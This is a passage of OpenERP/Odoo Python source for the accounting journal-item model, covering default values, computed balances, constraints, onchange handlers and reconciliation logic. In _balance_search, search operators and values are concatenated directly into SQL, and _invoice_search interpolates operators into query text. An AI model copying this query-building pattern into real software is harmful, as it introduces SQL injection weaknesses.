or move_line_dict.get('name') data['partner_id'] = data.get('partner_id') or move_line_dict.get('partner_id') total += move_line_dict.get('debit', 0.0) - move_line_dict.get('credit', 0.0) elif context.get('period_id'): #find the date and the ID of the last unbalanced account.move encoded by the current user in that journal and period move_id = False cr.execute('''SELECT move_id, date FROM account_move_line WHERE journal_id = %s AND period_id = %s AND create_uid = %s AND state = %s ORDER BY id DESC limit 1''', (context['journal_id'], context['period_id'], uid, 'draft')) res = cr.fetchone() move_id = res and res[0] or False data['date'] = res and res[1] or period_obj.browse(cr, uid, context['period_id'], context=context).date_start data['move_id'] = move_id if move_id: #if there exist some unbalanced accounting entries that match the journal and the period, #we propose to continue the same move by copying the ref, the name, the partner... move = move_obj.browse(cr, uid, move_id, context=context) data.setdefault('name', move.line_id[-1].name) for l in move.line_id: data['partner_id'] = data.get('partner_id') or l.partner_id.id data['ref'] = data.get('ref') or l.ref total += (l.debit or 0.0) - (l.credit or 0.0) #compute the total of current move data['debit'] = total < 0 and -total or 0.0 data['credit'] = total > 0 and total or 0.0 #pick the good account on the journal accordingly if the next proposed line will be a debit or a credit journal_data = journal_obj.browse(cr, uid, context['journal_id'], context=context) account = total > 0 and journal_data.default_credit_account_id or journal_data.default_debit_account_id #map the account using the fiscal position of the partner, if needed part = data.get('partner_id') and partner_obj.browse(cr, uid, data['partner_id'], context=context) or False if account and data.get('partner_id'): account = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, account.id) account = account_obj.browse(cr, uid, account, context=context) data['account_id'] = account and account.id or False #compute the amount in secondary currency of the account, if needed if account and account.currency_id: data['currency_id'] = account.currency_id.id #set the context for the multi currency change compute_ctx = context.copy() compute_ctx.update({ #the following 2 parameters are used to choose the currency rate, in case where the account #doesn't work with an outgoing currency rate method 'at date' but 'average' 'res.currency.compute.account': account, 'res.currency.compute.account_invert': True, }) if data.get('date'): compute_ctx.update({'date': data['date']}) data['amount_currency'] = currency_obj.compute(cr, uid, account.company_id.currency_id.id, data['currency_id'], -total, context=compute_ctx) data = self._default_get_move_form_hook(cr, uid, data) return data def on_create_write(self, cr, uid, id, context=None): if not id: return [] ml = self.browse(cr, uid, id, context=context) return map(lambda x: x.id, ml.move_id.line_id) def _balance(self, cr, uid, ids, name, arg, context=None): if context is None: context = {} c = context.copy() c['initital_bal'] = True sql = """SELECT l1.id, COALESCE(SUM(l2.debit-l2.credit), 0) FROM account_move_line l1 LEFT JOIN account_move_line l2 ON (l1.account_id = l2.account_id AND l2.id <= l1.id AND """ + \ self._query_get(cr, uid, obj='l2', context=c) + \ ") WHERE l1.id IN %s GROUP BY l1.id" cr.execute(sql, [tuple(ids)]) return dict(cr.fetchall()) def _invoice(self, cursor, user, ids, name, arg, context=None): invoice_obj = self.pool.get('account.invoice') res = {} for line_id in ids: res[line_id] = False cursor.execute('SELECT l.id, i.id ' \ 'FROM account_move_line l, account_invoice i ' \ 'WHERE l.move_id = i.move_id ' \ 'AND l.id IN %s', (tuple(ids),)) invoice_ids = [] for line_id, invoice_id in cursor.fetchall(): res[line_id] = invoice_id invoice_ids.append(invoice_id) invoice_names = {False: ''} for invoice_id, name in invoice_obj.name_get(cursor, user, invoice_ids, context=context): invoice_names[invoice_id] = name for line_id in res.keys(): invoice_id = res[line_id] res[line_id] = (invoice_id, invoice_names[invoice_id]) return res def name_get(self, cr, uid, ids, context=None): if not ids: return [] result = [] for line in self.browse(cr, uid, ids, context=context): if line.ref: result.append((line.id, (line.move_id.name or '')+' ('+line.ref+')')) else: result.append((line.id, line.move_id.name)) return result def _balance_search(self, cursor, user, obj, name, args, domain=None, context=None): if context is None: context = {} if not args: return [] where = ' AND '.join(map(lambda x: '(abs(sum(debit-credit))'+x[1]+str(x[2])+')',args)) cursor.execute('SELECT id, SUM(debit-credit) FROM account_move_line \ GROUP BY id, debit, credit having '+where) res = cursor.fetchall() if not res: return [('id', '=', '0')] return [('id', 'in', [x[0] for x in res])] def _invoice_search(self, cursor, user, obj, name, args, context=None): if not args: return [] invoice_obj = self.pool.get('account.invoice') i = 0 while i < len(args): fargs = args[i][0].split('.', 1) if len(fargs) > 1: args[i] = (fargs[0], 'in', invoice_obj.search(cursor, user, [(fargs[1], args[i][1], args[i][2])])) i += 1 continue if isinstance(args[i][2], basestring): res_ids = invoice_obj.name_search(cursor, user, args[i][2], [], args[i][1]) args[i] = (args[i][0], 'in', [x[0] for x in res_ids]) i += 1 qu1, qu2 = [], [] for x in args: if x[1] != 'in': if (x[2] is False) and (x[1] == '='): qu1.append('(i.id IS NULL)') elif (x[2] is False) and (x[1] == '<>' or x[1] == '!='): qu1.append('(i.id IS NOT NULL)') else: qu1.append('(i.id %s %s)' % (x[1], '%s')) qu2.append(x[2]) elif x[1] == 'in': if len(x[2]) > 0: qu1.append('(i.id IN (%s))' % (','.join(['%s'] * len(x[2])))) qu2 += x[2] else: qu1.append(' (False)') if qu1: qu1 = ' AND' + ' AND'.join(qu1) else: qu1 = '' cursor.execute('SELECT l.id ' \ 'FROM account_move_line l, account_invoice i ' \ 'WHERE l.move_id = i.move_id ' + qu1, qu2) res = cursor.fetchall() if not res: return [('id', '=', '0')] return [('id', 'in', [x[0] for x in res])] def _get_move_lines(self, cr, uid, ids, context=None): result = [] for move in self.pool.get('account.move').browse(cr, uid, ids, context=context): for line in move.line_id: result.append(line.id) return result def _get_reconcile(self, cr, uid, ids,name, unknow_none, context=None): res = dict.fromkeys(ids, False) for line in self.browse(cr, uid, ids, context=context): if line.reconcile_id: res[line.id] = str(line.reconcile_id.name) elif line.reconcile_partial_id: res[line.id] = str(line.reconcile_partial_id.name) return res def _get_move_from_reconcile(self, cr, uid, ids, context=None): move = {} for r in self.pool.get('account.move.reconcile').browse(cr, uid, ids, context=context): for line in r.line_partial_ids: move[line.move_id.id] = True for line in r.line_id: move[line.move_id.id] = True move_line_ids = [] if move: move_line_ids = self.pool.get('account.move.line').search(cr, uid, [('journal_id','in',move.keys())], context=context) return move_line_ids _columns = { 'name': fields.char('Name', required=True), 'quantity': fields.float('Quantity', digits=(16,2), help="The optional quantity expressed by this line, eg: number of product sold. The quantity is not a legal requirement but is very useful for some reports."), 'product_uom_id': fields.many2one('product.uom', 'Unit of Measure'), 'product_id': fields.many2one('product.product', 'Product'), 'debit': fields.float('Debit', digits_compute=dp.get_precision('Account')), 'credit': fields.float('Credit', digits_compute=dp.get_precision('Account')), 'account_id': fields.many2one('account.account', 'Account', required=True, ondelete="cascade", domain=[('type','<>','view'), ('type', '<>', 'closed')], select=2), 'move_id': fields.many2one('account.move', 'Journal Entry', ondelete="cascade", help="The move of this entry line.", select=2, required=True), 'narration': fields.related('move_id','narration', type='text', relation='account.move', string='Internal Note'), 'ref': fields.related('move_id', 'ref', string='Reference', type='char', store=True), 'statement_id': fields.many2one('account.bank.statement', 'Statement', help="The bank statement used for bank reconciliation", select=1, copy=False), 'reconcile_id': fields.many2one('account.move.reconcile', 'Reconcile', readonly=True, ondelete='set null', select=2, copy=False), 'reconcile_partial_id': fields.many2one('account.move.reconcile', 'Partial Reconcile', readonly=True, ondelete='set null', select=2, copy=False), 'reconcile_ref': fields.function(_get_reconcile, type='char', string='Reconcile Ref', oldname='reconcile', store={ 'account.move.line': (lambda self, cr, uid, ids, c={}: ids, ['reconcile_id','reconcile_partial_id'], 50),'account.move.reconcile': (_get_move_from_reconcile, None, 50)}), 'amount_currency': fields.float('Amount Currency', help="The amount expressed in an optional other currency if it is a multi-currency entry.", digits_compute=dp.get_precision('Account')), 'amount_residual_currency': fields.function(_amount_residual, string='Residual Amount in Currency', multi="residual", help="The residual amount on a receivable or payable of a journal entry expressed in its currency (maybe different of the company currency)."), 'amount_residual': fields.function(_amount_residual, string='Residual Amount', multi="residual", help="The residual amount on a receivable or payable of a journal entry expressed in the company currency."), 'currency_id': fields.many2one('res.currency', 'Currency', help="The optional other currency if it is a multi-currency entry."), 'journal_id': fields.related('move_id', 'journal_id', string='Journal', type='many2one', relation='account.journal', required=True, select=True, store = { 'account.move': (_get_move_lines, ['journal_id'], 20) }), 'period_id': fields.related('move_id', 'period_id', string='Period', type='many2one', relation='account.period', required=True, select=True, store = { 'account.move': (_get_move_lines, ['period_id'], 20) }), 'blocked': fields.boolean('No Follow-up', help="You can check this box to mark this journal item as a litigation with the associated partner"), 'partner_id': fields.many2one('res.partner', 'Partner', select=1, ondelete='restrict'), 'date_maturity': fields.date('Due date', select=True ,help="This field is used for payable and receivable journal entries. You can put the limit date for the payment of this line."), 'date': fields.related('move_id','date', string='Effective date', type='date', required=True, select=True, store = { 'account.move': (_get_move_lines, ['date'], 20) }), 'date_created': fields.date('Creation date', select=True), 'analytic_lines': fields.one2many('account.analytic.line', 'move_id', 'Analytic lines'), 'centralisation': fields.selection([('normal','Normal'),('credit','Credit Centralisation'),('debit','Debit Centralisation'),('currency','Currency Adjustment')], 'Centralisation', size=8), 'balance': fields.function(_balance, fnct_search=_balance_search, string='Balance'), 'state': fields.selection([('draft','Unbalanced'), ('valid','Balanced')], 'Status', readonly=True, copy=False), 'tax_code_id': fields.many2one('account.tax.code', 'Tax Account', help="The Account can either be a base tax code or a tax code account."), 'tax_amount': fields.float('Tax/Base Amount', digits_compute=dp.get_precision('Account'), select=True, help="If the Tax account is a tax code account, this field will contain the taxed amount.If the tax account is base tax code, "\ "this field will contain the basic amount(without tax)."), 'invoice': fields.function(_invoice, string='Invoice', type='many2one', relation='account.invoice', fnct_search=_invoice_search), 'account_tax_id':fields.many2one('account.tax', 'Tax', copy=False), 'analytic_account_id': fields.many2one('account.analytic.account', 'Analytic Account'), 'company_id': fields.related('account_id', 'company_id', type='many2one', relation='res.company', string='Company', store=True, readonly=True) } def _get_date(self, cr, uid, context=None): if context is None: context or {} period_obj = self.pool.get('account.period') dt = time.strftime('%Y-%m-%d') if context.get('journal_id') and context.get('period_id'): cr.execute('SELECT date FROM account_move_line ' \ 'WHERE journal_id = %s AND period_id = %s ' \ 'ORDER BY id DESC limit 1', (context['journal_id'], context['period_id'])) res = cr.fetchone() if res: dt = res[0] else: period = period_obj.browse(cr, uid, context['period_id'], context=context) dt = period.date_start return dt def _get_currency(self, cr, uid, context=None): if context is None: context = {} if not context.get('journal_id', False): return False cur = self.pool.get('account.journal').browse(cr, uid, context['journal_id']).currency return cur and cur.id or False def _get_period(self, cr, uid, context=None): """ Return default account period value """ context = context or {} if context.get('period_id', False): return context['period_id'] account_period_obj = self.pool.get('account.period') ids = account_period_obj.find(cr, uid, context=context) period_id = False if ids: period_id = ids[0] return period_id def _get_journal(self, cr, uid, context=None): """ Return journal based on the journal type """ context = context or {} if context.get('journal_id', False): return context['journal_id'] journal_id = False journal_pool = self.pool.get('account.journal') if context.get('journal_type', False): jids = journal_pool.search(cr, uid, [('type','=', context.get('journal_type'))]) if not jids: model, action_id = self.pool['ir.model.data'].get_object_reference(cr, uid, 'account', 'action_account_journal_form') msg = _("""Cannot find any account journal of "%s" type for this company, You should create one.\n Please go to Journal Configuration""") % context.get('journal_type').replace('_', ' ').title() raise openerp.exceptions.RedirectWarning(msg, action_id, _('Go to the configuration panel')) journal_id = jids[0] return journal_id _defaults = { 'blocked': False, 'centralisation': 'normal', 'date': _get_date, 'date_created': fields.date.context_today, 'state': 'draft', 'currency_id': _get_currency, 'journal_id': _get_journal, 'credit': 0.0, 'debit': 0.0, 'amount_currency': 0.0, 'account_id': lambda self, cr, uid, c: c.get('account_id', False), 'period_id': _get_period, 'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'account.move.line', context=c) } _order = "date desc, id desc" _sql_constraints = [ ('credit_debit1', 'CHECK (credit*debit=0)', 'Wrong credit or debit value in accounting entry !'), ('credit_debit2', 'CHECK (credit+debit>=0)', 'Wrong credit or debit value in accounting entry !'), ] def _auto_init(self, cr, context=None): res = super(account_move_line, self)._auto_init(cr, context=context) cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'account_move_line_journal_id_period_id_index\'') if not cr.fetchone(): cr.execute('CREATE INDEX account_move_line_journal_id_period_id_index ON account_move_line (journal_id, period_id)') cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = %s', ('account_move_line_date_id_index',)) if not cr.fetchone(): cr.execute('CREATE INDEX account_move_line_date_id_index ON account_move_line (date DESC, id desc)') return res def _check_no_view(self, cr, uid, ids, context=None): lines = self.browse(cr, uid, ids, context=context) for l in lines: if l.account_id.type in ('view', 'consolidation'): return False return True def _check_no_closed(self, cr, uid, ids, context=None): lines = self.browse(cr, uid, ids, context=context) for l in lines: if l.account_id.type == 'closed': raise osv.except_osv(_('Error!'), _('You cannot create journal items on a closed account %s %s.') % (l.account_id.code, l.account_id.name)) return True def _check_company_id(self, cr, uid, ids, context=None): lines = self.browse(cr, uid, ids, context=context) for l in lines: if l.company_id != l.account_id.company_id or l.company_id != l.period_id.company_id: return False return True def _check_date(self, cr, uid, ids, context=None): for l in self.browse(cr, uid, ids, context=context): if l.journal_id.allow_date: if not time.strptime(l.date[:10],'%Y-%m-%d') >= time.strptime(l.period_id.date_start, '%Y-%m-%d') or not time.strptime(l.date[:10], '%Y-%m-%d') <= time.strptime(l.period_id.date_stop, '%Y-%m-%d'): return False return True def _check_currency(self, cr, uid, ids, context=None): for l in self.browse(cr, uid, ids, context=context): if l.account_id.currency_id: if not l.currency_id or not l.currency_id.id == l.account_id.currency_id.id: return False return True def _check_currency_and_amount(self, cr, uid, ids, context=None): for l in self.browse(cr, uid, ids, context=context): if (l.amount_currency and not l.currency_id): return False return True def _check_currency_amount(self, cr, uid, ids, context=None): for l in self.browse(cr, uid, ids, context=context): if l.amount_currency: if (l.amount_currency > 0.0 and l.credit > 0.0) or (l.amount_currency < 0.0 and l.debit > 0.0): return False return True def _check_currency_company(self, cr, uid, ids, context=None): for l in self.browse(cr, uid, ids, context=context): if l.currency_id.id == l.company_id.currency_id.id: return False return True _constraints = [ (_check_no_view, 'You cannot create journal items on an account of type view or consolidation.', ['account_id']), (_check_no_closed, 'You cannot create journal items on closed account.', ['account_id']), (_check_company_id, 'Account and Period must belong to the same company.', ['company_id']), (_check_date, 'The date of your Journal Entry is not in the defined period! You should change the date or remove this constraint from the journal.', ['date']), (_check_currency, 'The selected account of your Journal Entry forces to provide a secondary currency. You should remove the secondary currency on the account or select a multi-currency view on the journal.', ['currency_id']), (_check_currency_and_amount, "You cannot create journal items with a secondary currency without recording both 'currency' and 'amount currency' field.", ['currency_id','amount_currency']), (_check_currency_amount, 'The amount expressed in the secondary currency must be positive when account is debited and negative when account is credited.', ['amount_currency']), (_check_currency_company, "You cannot provide a secondary currency if it is the same than the company one." , ['currency_id']), ] #TODO: ONCHANGE_ACCOUNT_ID: set account_tax_id def onchange_currency(self, cr, uid, ids, account_id, amount, currency_id, date=False, journal=False, context=None): if context is None: context = {} account_obj = self.pool.get('account.account') journal_obj = self.pool.get('account.journal') currency_obj = self.pool.get('res.currency') if (not currency_id) or (not account_id): return {} result = {} acc = account_obj.browse(cr, uid, account_id, context=context) if (amount>0) and journal: x = journal_obj.browse(cr, uid, journal).default_credit_account_id if x: acc = x context = dict(context) context.update({ 'date': date, 'res.currency.compute.account': acc, }) v = currency_obj.compute(cr, uid, currency_id, acc.company_id.currency_id.id, amount, context=context) result['value'] = { 'debit': v > 0 and v or 0.0, 'credit': v < 0 and -v or 0.0 } return result def onchange_partner_id(self, cr, uid, ids, move_id, partner_id, account_id=None, debit=0, credit=0, date=False, journal=False, context=None): partner_obj = self.pool.get('res.partner') payment_term_obj = self.pool.get('account.payment.term') journal_obj = self.pool.get('account.journal') fiscal_pos_obj = self.pool.get('account.fiscal.position') val = {} val['date_maturity'] = False if not partner_id: return {'value':val} if not date: date = datetime.now().strftime('%Y-%m-%d') jt = False if journal: jt = journal_obj.browse(cr, uid, journal, context=context).type part = partner_obj.browse(cr, uid, partner_id, context=context) payment_term_id = False if jt and jt in ('purchase', 'purchase_refund') and part.property_supplier_payment_term: payment_term_id = part.property_supplier_payment_term.id elif jt and part.property_payment_term: payment_term_id = part.property_payment_term.id if payment_term_id: res = payment_term_obj.compute(cr, uid, payment_term_id, 100, date) if res: val['date_maturity'] = res[0][0] if not account_id: id1 = part.property_account_payable.id id2 = part.property_account_receivable.id if jt: if jt in ('sale', 'purchase_refund'): val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id2) elif jt in ('purchase', 'sale_refund'): val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id1) elif jt in ('general', 'bank', 'cash'): if part.customer: val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id2) elif part.supplier: val['account_id'] = fiscal_pos_obj.map_account(cr, uid, part and part.property_account_position or False, id1) if val.get('account_id', False): d = self.onchange_account_id(cr, uid, ids, account_id=val['account_id'], partner_id=part.id, context=context) val.update(d['value']) return {'value':val} def onchange_account_id(self, cr, uid, ids, account_id=False, partner_id=False, context=None): account_obj = self.pool.get('account.account') partner_obj = self.pool.get('res.partner') fiscal_pos_obj = self.pool.get('account.fiscal.position') val = {} if account_id: res = account_obj.browse(cr, uid, account_id, context=context) tax_ids = res.tax_ids if tax_ids and partner_id: part = partner_obj.browse(cr, uid, partner_id, context=context) tax_id = fiscal_pos_obj.map_tax(cr, uid, part and part.property_account_position or False, tax_ids)[0] else: tax_id = tax_ids and tax_ids[0].id or False val['account_tax_id'] = tax_id return {'value': val} # # type: the type if reconciliation (no logic behind this field, for info) # # writeoff; entry generated for the difference between the lines # def search(self, cr, uid, args, offset=0, limit=None, order=None, context=None, count=False): if context is None: context = {} if context.get('fiscalyear'): args.append(('period_id.fiscalyear_id', '=', context.get('fiscalyear', False))) if context and context.get('next_partner_only', False): if not context.get('partner_id', False): partner = self.list_partners_to_reconcile(cr, uid, context=context) if partner: partner = partner[0] else: partner = context.get('partner_id', False) if not partner: return [] args.append(('partner_id', '=', partner[0])) return super(account_move_line, self).search(cr, uid, args, offset, limit, order, context, count) def prepare_move_lines_for_reconciliation_widget(self, cr, uid, lines, target_currency=False, target_date=False, context=None): """ Returns move lines formatted for the manual/bank reconciliation widget :param target_currency: curreny you want the move line debit/credit converted into :param target_date: date to use for the monetary conversion """ if not lines: return [] if context is None: context = {} ctx = context.copy() currency_obj = self.pool.get('res.currency') company_currency = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.currency_id rml_parser = report_sxw.rml_parse(cr, uid, 'reconciliation_widget_aml', context=context) ret = [] for line in lines: partial_reconciliation_siblings_ids = [] if line.reconcile_partial_id: partial_reconciliation_siblings_ids = self.search(cr, uid, [('reconcile_partial_id', '=', line.reconcile_partial_id.id)], context=context) partial_reconciliation_siblings_ids.remove(line.id) ret_line = { 'id': line.id, 'name': line.name != '/' and line.move_id.name + ': ' + line.name or line.move_id.name, 'ref': line.move_id.ref, 'account_code': line.account_id.code, 'account_name': line.account_id.name, 'account_type': line.account_id.type, 'date_maturity': line.date_maturity, 'date': line.date, 'period_name': line.period_id.name, 'journal_name': line.journal_id.name, 'partner_id': line.partner_id.id, 'partner_name': line.partner_id.name, 'is_partially_reconciled': bool(line.reconcile_partial_id), 'partial_reconciliation_siblings_ids': partial_reconciliation_siblings_ids, } # Amount residual can be negative debit = line.debit credit = line.credit total_amount = abs(debit - credit) total_amount_currency = line.amount_currency amount_residual = line.amount_residual amount_residual_currency = line.amount_residual_currency if line.amount_residual < 0: debit, credit = credit, debit amount_residual = -amount_residual amount_residual_currency = -amount_residual_currency # Get right debit / credit: line_currency = line.currency_id or company_currency amount_currency_str = "" total_amount_currency_str = "" if line.currency_id and line.amount_currency: amount_currency_str = rml_parser.formatLang(amount_residual_currency, currency_obj=line.currency_id) total_amount_currency_str = rml_parser.formatLang(total_amount_currency, currency_obj=line.currency_id) if target_currency and line_currency == target_currency and target_currency != company_currency: debit = debit > 0 and amount_residual_currency or 0.0 credit = credit > 0 and amount_residual_currency or 0.0 amount_currency_str = rml_parser.formatLang(amount_residual, currency_obj=company_currency) total_amount_currency_str = rml_parser.formatLang(total_amount, currency_obj=company_currency) amount_str = rml_parser.formatLang(debit or credit, currency_obj=target_currency) total_amount_str = rml_parser.formatLang(total_amount_currency, currency_obj=target_currency) else: debit = debit > 0 and amount_residual or 0.0 credit = credit > 0 and amount_residual or 0.0 amount_str = rml_parser.formatLang(debit or credit, currency_obj=company_currency) total_amount_str = rml_parser.formatLang(total_amount, currency_obj=company_currency) if target_currency and target_currency != company_currency: amount_currency_str = rml_parser.formatLang(debit or credit, currency_obj=line_currency) total_amount_currency_str = rml_parser.formatLang(total_amount, currency_obj=line_currency) ctx = context.copy() if target_date: ctx.update({'date': target_date}) debit = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, debit, context=ctx) credit = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, credit, context=ctx) amount_str = rml_parser.formatLang(debit or credit, currency_obj=target_currency) total_amount = currency_obj.compute(cr, uid, company_currency.id, target_currency.id, total_amount, context=ctx) total_amount_str = rml_parser.formatLang(total_amount, currency_obj=target_currency) ret_line['credit'] = credit ret_line['debit'] = debit ret_line['amount_str'] = amount_str ret_line['amount_currency_str'] = amount_currency_str ret_line['total_amount_str'] = total_amount_str # For partial reconciliations ret_line['total_amount_currency_str'] = total_amount_currency_str ret.append(ret_line) return ret def list_partners_to_reconcile(self, cr, uid, context=None): cr.execute( """SELECT partner_id FROM ( SELECT l.partner_id, p.last_reconciliation_date, SUM(l.debit) AS debit, SUM(l.credit) AS credit, MAX(l.create_date) AS max_date FROM account_move_line l RIGHT JOIN account_account a ON (a.id = l.account_id) RIGHT JOIN res_partner p ON (l.partner_id = p.id) WHERE a.reconcile IS TRUE AND l.reconcile_id IS NULL AND l.state <> 'draft' GROUP BY l.partner_id, p.last_reconciliation_date ) AS s WHERE debit > 0 AND credit > 0 AND (last_reconciliation_date IS NULL OR max_date > last_reconciliation_date) ORDER BY last_reconciliation_date""") ids = [x[0] for x in cr.fetchall()] if not ids: return [] # To apply the ir_rules partner_obj = self.pool.get('res.partner') ids = partner_obj.search(cr, uid, [('id', 'in', ids)], context=context) return partner_obj.name_get(cr, uid, ids, context=context) def reconcile_partial(self, cr, uid, ids, type='auto', context=None, writeoff_acc_id=False, writeoff_period_id=False, writeoff_journal_id=False): move_rec_obj = self.pool.get('account.move.reconcile') merges = [] unmerge = [] total = 0.0 merges_rec = [] company_list = [] if context is None: context = {} for line in self.browse(cr, uid, ids, context=context): if company_list and not line.company_id.id in company_list: raise osv.except_osv(_('Warning!'), _('To reconcile the entries company should be the same for all entries.')) company_list.append(line.company_id.id) for line in self.browse(cr, uid, ids, context=context): if line.account_id.currency_id: currency_id = line.account_id.currency_id else: currency_id = line.company_id.currency_id if line.reconcile_id: raise osv.except_osv(_('Warning'), _("Journal Item '%s' (id: %s), Move '%s' is already reconciled!") % (line.name, line.id, line.move_id.name)) if line.reconcile_partial_id: for line2 in line.reconcile_partial_id.line_partial_ids: if line2.state != 'valid': raise osv.except_osv(_('Warning'), _("Journal Item '%s' (id: %s) cannot be used in a reconciliation as it is not balanced!") % (line2.name, line2.id)) if not line2.reconcile_id: if line2.id not in merges: merges.append(line2.id) if line2.account_id.currency_id: total += line2.amount_currency else: total += (line2.debit or 0.0) - (line2.credit or 0.0) merges_rec.append(line.reconcile_partial_id.id) else: unmerge.append(line.id) if line.account_id.currency_id: total += line.amount_currency else: total += (line.debit or 0.0) - (line.credit or 0.0) if self.pool.get('res.currency').is_zero(cr, uid, currency_id, total): res = self.reconcile(cr, uid, merges+unmerge, context=context, writeoff_acc_id=writeoff_acc_id, writeoff_period_id=writeoff_period_id, writeoff_journal_id=writeoff_journal_id) return res # marking the lines as reconciled does not change their validity, so there is no need # to revalidate their moves completely. reconcile_context = dict(context, novalidate=True) r_id = move_rec_obj.create(cr, uid, { 'type': type, 'line_partial_ids': map(lambda x: (4,x,False), merges+unmerge) }, context=reconcile_context) move_rec_obj.reconcile_partial_check(cr, uid, [r_id] + merges_rec, context=reconcile_context) return r_id def reconcile(self, cr, uid, ids, type='auto', writeoff_acc_id=False, writeoff_period_id=False, writeoff_journal_id=False, context=None): account_obj = self.pool.get('account.account') move_obj = self.pool.get('account.move') move_rec_obj = self.pool.get('account.move.reconcile') partner_obj = self.pool.get('res.partner') currency_obj = self.pool.get('res.currency') lines = self.browse(cr, uid, ids, context=context) unrec_lines = filter(lambda x: not x['reconcile_id'], lines) credit = debit = 0.0 currency = 0.0 account_id = False partner_id = False if context is None: context = {} company_list = [] for line in self.browse(cr, uid, ids, context=context): if company_list and not line.company_id.id in company_list: raise osv.except_osv(_('Warning!'), _('To reconcile the entries company should be the same for all entries.')) company_list.append(line.company_id.id) for line in unrec_lines: if line.state <> 'valid': raise osv.except_osv(_('Error!'), _('Entry "%s" is not valid !') % line.name) credit += line['credit'] debit += line['debit'] currency += line['amount_currency'] or 0.0 account_id = line['account_id']['id'] partner_id = (line['partner_id'] and line['partner_id']['id']) or False writeoff = debit - credit # Ifdate_p in context => take this date if context.has_key('date_p') and context['date_p']: date=context['date_p'] else: date = time.strftime('%Y-%m-%d') cr.execute('SELECT account_id, reconcile_id '\ 'FROM account_move_line '\ 'WHERE id IN %s '\ 'GROUP BY account_id,reconcile_id', (tuple(ids), )) r = cr.fetchall() #TODO: move this check to a constraint in the account_move_reconcile object if len(r) != 1: raise osv.except_osv(_('Error'), _('Entries are not of the same account or already reconciled ! ')) if not unrec_lines: raise osv.except_osv(_('Error!'), _('Entry is already reconciled.')) account = account_obj.browse(cr, uid, account_id, context=context) if not account.reconcile: raise osv.except_osv(_('Error'), _('The account is not defined to be reconciled !')) if r[0][1] != None: raise osv.except_osv(_('Error!'), _('Some entries are already reconciled.')) if (not currency_obj.is_zero(cr, uid, account.company_id.currency_id, writeoff)) or \ (account.currency_id and (not currency_obj.is_zero(cr, uid, account.currency_id, currency))): if not writeoff_acc_id: raise osv.except_osv(_('Warning!'), _('You have to provide an account for the write off/exchange difference entry.')) if writeoff > 0: debit = writeoff credit = 0.0 self_credit = writeoff self_debit = 0.0 else: debit = 0.0 credit = -writeoff self_credit = 0.0 self_debit = -writeoff # If comment exist in context, take it if 'comment' in context and context['comment']: libelle = context['comment'] else: libelle = _('Write-Off') cur_obj = self.pool.get('res.currency') cur_id = False amount_currency_writeoff = 0.0 if context.get('company_currency_id',False) != context.get('currency_id',False): cur_id = context.get('currency_id',False) for line in unrec_lines: if line.currency_id and line.currency_id.id == context.get('currency_id',False): amount_currency_writeoff += line.amount_currency else: tmp_amount = cur_obj.compute(cr, uid, line.account_id.company_id.currency_id.id, context.get('currency_id',False), abs(line.debit-line.credit), context={'date': line.date}) amount_currency_writeoff += (line.debit > 0) and tmp_amount or -tmp_amount writeoff_lines = [ (0, 0, { 'name': libelle, 'debit': self_debit, 'credit': self_credit, 'account_id': account_id, 'date': date, 'partner_id': partner_id, 'currency_id': cur_id or (account.currency_id.id or False), 'amount_currency': amount_currency_writeoff and -1 * amount_currency_writeoff or (account.currency_id.id and -1 * currency or 0.0) }), (0, 0, { 'name': libelle, 'debit': debit, 'credit': credit, 'account_id': writeoff_acc_id, 'analytic_account_id': context.get('analytic_id', False), 'date': date, 'partner_id': partner_id, 'currency_id': cur_id or (account.currency_id.id or False), 'amount_currency': amount_currency_writeoff and amount_currency_writeoff or (account.currency_id.id and currency or 0.0) }) ] writeoff_move_id = move_obj.create(cr, uid, { 'period_id': writeoff_period_id, 'journal_id': writeoff_journal_id, 'date':date, 'state': 'draft', 'line_id': writeoff_lines }) writeoff_line_ids = self.search(cr, uid, [('move_id', '=', writeoff_move_id), ('account_id', '=', account_id)]) if account_id == writeoff_acc_id: writeoff_line_ids = [writeoff_line_ids[1]] ids += writeoff_line_ids # marking the lines as reconciled does not change their validity, so there is no need # to revalidate their moves completely. reconcile_context = dict(context, novalidate=True) r_id = move_rec_obj.create(cr, uid, { 'type': type, 'line_id': map(lambda x: (4, x, False), ids), 'line_partial_ids': map(lambda x: (3, x, False), ids) }, context=reconcile_context) # the id of the move.reconcile is written in the move.line (self) by the create method above # because of the way the line_id are defined: (4, x, False) for id in ids: workflow.trg_trigger(uid, 'account.move.line', id, cr) if lines and lines[0]: partner_id = lines[0].partner_id and lines[0].partner_id.id or False if partner_id and not partner_obj.has_something_to_reconcile(cr, uid, partner_id, context=context): partner_obj.mark_as_reconciled(cr, uid, [partner_id], context=context) return r_id def view_header_get(self, cr, user, view_id, view_type, context=None): if context is None: context = {} context = self.convert_to_period(cr, user, context=context) if context.get('account_id', False): cr.execute('SELECT code FROM account_account WHERE id = %s', (context['account_id'], )) res = cr.fetchone() if res: res = _('Entries: ')+ (res[0] or '') return res if (not context.get('journal_id', False)) or (not context.get('period_id', False)): return False if context.get('search_default_journal_id', False): context['journal_id'] = context.get('search_default_journal_id') cr.execute('SELECT code FROM account_journal WHERE id = %s', (context['journal_id'], )) j = cr.fetchone()[0] or '' cr.execute('SELECT code FROM account_period WHERE id = %s', (context['period_id'], )) p = cr.fetchone()[0] or '' if j or p: return j + (p and (':' + p) or '') return False def onchange_date(self, cr, user, ids, date, context=None): """ Returns a dict that contains new values and context @param cr: A database cursor @param user: ID of the user currently logged in @param date: latest value from user input for field date @param args: other arguments @param context: context arguments, like lang, time zone @return: Returns a dict which contains new values, and context """ res = {} if context is None: context = {} period_pool = self.pool.get('account.period') pids = period_pool.find(cr, user, date, context=context) if pids: res.update({'period_id':pids[0]}) context = dict(context, period_id=pids[0]) return { 'value':res, 'context':context, } def _check_moves(self, cr, uid, context=None): # use the first move ever created for this journal and period if context is None: context = {} cr.execute('SELECT id, state, name FROM account_move WHERE journal_id = %s AND period_id = %s ORDER BY id limit 1', (context['journal_id'],context['period_id'])) res = cr.fetchone() if res: if 